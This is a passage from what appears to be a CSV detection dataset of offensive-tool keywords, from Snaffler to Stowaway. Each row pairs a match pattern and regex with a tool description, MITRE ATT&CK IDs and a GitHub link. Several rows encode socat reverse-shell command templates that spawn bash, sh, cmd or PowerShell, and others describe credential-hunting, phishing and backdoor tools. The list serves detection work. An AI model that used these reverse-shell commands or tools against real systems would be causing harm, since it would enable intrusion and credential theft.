T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*snaffler.log*",".{0,1000}snaffler\.log.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*Snaffler.Properties*",".{0,1000}Snaffler\.Properties.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Snaffler.sln*",".{0,1000}Snaffler\.sln.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*Snaffler.sln*",".{0,1000}Snaffler\.sln.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*Snaffler.SnaffRules*",".{0,1000}Snaffler\.SnaffRules.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SnafflerMessage.cs*",".{0,1000}SnafflerMessage\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*SnafflerMessageType.cs*",".{0,1000}SnafflerMessageType\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*SnaffPoint.exe*",".{0,1000}SnaffPoint\.exe.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","7","3","210","20","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" "*SnaffPoint-main*",".{0,1000}SnaffPoint\-main.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","7","3","210","20","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" "*snallygaster*",".{0,1000}snallygaster.{0,1000}","offensive_tool_keyword","snallygaster","Finds file leaks and other security problems on HTTP servers.snallygaster is a tool that looks for files accessible on web servers that shouldn't be public and can pose a security risk.","T1595.001 - T1210","TA0007 - TA0009","N/A","N/A","Information Gathering","https://github.com/hannob/snallygaster","1","0","N/A","N/A","10","2020","231","2024-04-22T11:00:45Z","2018-04-10T12:01:16Z" "*sneaky_gophish*",".{0,1000}sneaky_gophish.{0,1000}","offensive_tool_keyword","gophish","Hiding GoPhish from the boys in blue","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/puzzlepeaches/sneaky_gophish/","1","1","N/A","10","10","152","44","2022-12-06T11:58:00Z","2021-06-24T12:41:54Z" "*sniff.su/Intercepter-NG*",".{0,1000}sniff\.su\/Intercepter\-NG.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SniffAir*",".{0,1000}SniffAir.{0,1000}","offensive_tool_keyword","SniffAir","SniffAir is an open-source wireless security framework which provides the ability to easily parse passively collected wireless data as well as launch sophisticated wireless attacks. SniffAir takes care of the hassle associated with managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic. looking for potential security flaws. Along with the prebuilt queries. SniffAir allows users to create custom queries for analyzing the wireless data stored in the backend SQL database. SniffAir is built on the concept of using these queries to extract data for wireless penetration test reports. The data can also be leveraged in setting up sophisticated wireless attacks included in SniffAir as modules.","T1530 - T1170 - T1059 - T1201","TA0002 - TA0003 - TA0007 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Tylous/SniffAir","1","1","N/A","N/A","10","1170","177","2020-10-14T04:00:27Z","2017-02-20T18:32:32Z" "*sniffer.py*",".{0,1000}sniffer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*sniffer_dump */tmp/*.pcap*",".{0,1000}sniffer_dump\s.{0,1000}\/tmp\/.{0,1000}\.pcap.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*sniffer-master.zip*",".{0,1000}sniffer\-master\.zip.{0,1000}","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","8","709","63","2024-03-02T07:48:19Z","2021-11-08T15:36:03Z" "*sniffers.llmnr_sniffer*",".{0,1000}sniffers\.llmnr_sniffer.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*SnifferSpoofer*",".{0,1000}SnifferSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*sniffglue*",".{0,1000}sniffglue.{0,1000}","offensive_tool_keyword","sniffglue","Secure multithreaded packet sniffer","T1040 - T1041 - T1046 - T1057 - T1071.001","TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kpcyrd/sniffglue","1","0","N/A","N/A","10","1050","94","2024-01-07T17:13:46Z","2017-09-12T16:26:24Z" "*snmp_default_pass.txt*",".{0,1000}snmp_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*snmpwn *passwords.txt*",".{0,1000}snmpwn\s.{0,1000}passwords\.txt.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","0","N/A","N/A","3","236","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" "*snmpwn.rb* --hosts *",".{0,1000}snmpwn\.rb.{0,1000}\s\-\-hosts\s.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do.","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","0","N/A","N/A","3","236","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" "*SOAPHound PoC 1.0.1-beta*",".{0,1000}SOAPHound\sPoC\s1\.0\.1\-beta.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*SOAPHound.exe *",".{0,1000}SOAPHound\.exe\s.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*SOAPHound.Processors*",".{0,1000}SOAPHound\.Processors.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*socat *",".{0,1000}socat\s.{0,1000}","offensive_tool_keyword","socat","socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file. pipe. device","T1048 - T1055 - T1562","TA0003 - TA0002 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/craSH/socat","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*socat TCP:*:* EXEC:""/bin/bash""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""\/bin\/bash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*socat TCP:*:* EXEC:""/bin/sh""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""\/bin\/sh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*socat TCP:*:* EXEC:""bash""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""bash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*socat TCP:*:* EXEC:""cmd""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""cmd\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*socat TCP:*:* EXEC:""powershell""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""powershell\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*socat TCP:*:* EXEC:""pwsh""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""pwsh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*socat TCP:*:* EXEC:""zsh""*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\""zsh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*socat TCP:*:* EXEC:sh*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:sh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*socat TCP:*:* EXEC:'sh*",".{0,1000}socat\sTCP\:.{0,1000}\:.{0,1000}\sEXEC\:\'sh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*socat tcp4-listen:1337*",".{0,1000}socat\stcp4\-listen\:1337.{0,1000}","offensive_tool_keyword","socat","listening on port 1337 -observed in variousmalware and poc explitation tools","T1049 - T1021.001 - T1572","TA0002 - TA0011 - TA0040","N/A","N/A","C2","N/A","1","0","N/A","8","6","N/A","N/A","N/A","N/A" "*Social Engineer Toolkit*",".{0,1000}Social\sEngineer\sToolkit.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec. LLC an information security consulting firm located in Cleveland. Ohio.","T1566 - T1059.004 - T1564.001","TA0001 - TA0002 - TA0007","N/A","N/A","Phishing","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","10238","2645","2023-12-21T20:10:33Z","2012-12-31T22:01:33Z" "*social_engineering/web_cloner*",".{0,1000}social_engineering\/web_cloner.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*SocialPwned.git*",".{0,1000}SocialPwned\.git.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","10","970","103","2024-04-07T21:32:39Z","2020-04-07T22:25:38Z" "*socialpwned.py*",".{0,1000}socialpwned\.py.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","10","970","103","2024-04-07T21:32:39Z","2020-04-07T22:25:38Z" "*socialpwned_*.txt*",".{0,1000}socialpwned_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","10","970","103","2024-04-07T21:32:39Z","2020-04-07T22:25:38Z" "*socket.gethostbyname(NO_IP_HOST)*",".{0,1000}socket\.gethostbyname\(NO_IP_HOST\).{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*SocketHijacking.*",".{0,1000}SocketHijacking\..{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*Socks server for reGeorg HTTP(s) tunneller*",".{0,1000}Socks\sserver\sfor\sreGeorg\sHTTP\(s\)\stunneller.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*socks*127.0.0.1 9050*",".{0,1000}socks.{0,1000}127\.0\.0\.1\s9050.{0,1000}","offensive_tool_keyword","proxychains","(TOR default) proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*socks5_exe.exe*",".{0,1000}socks5_exe\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*socks5h://127.0.0.1:9050*",".{0,1000}socks5h\:\/\/127\.0\.0\.1\:9050.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","0","N/A","10","10","73","12","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" "*--socks5-proxy socks5*",".{0,1000}\-\-socks5\-proxy\ssocks5.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*--socks5-proxyp socks5*",".{0,1000}\-\-socks5\-proxyp\ssocks5.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - 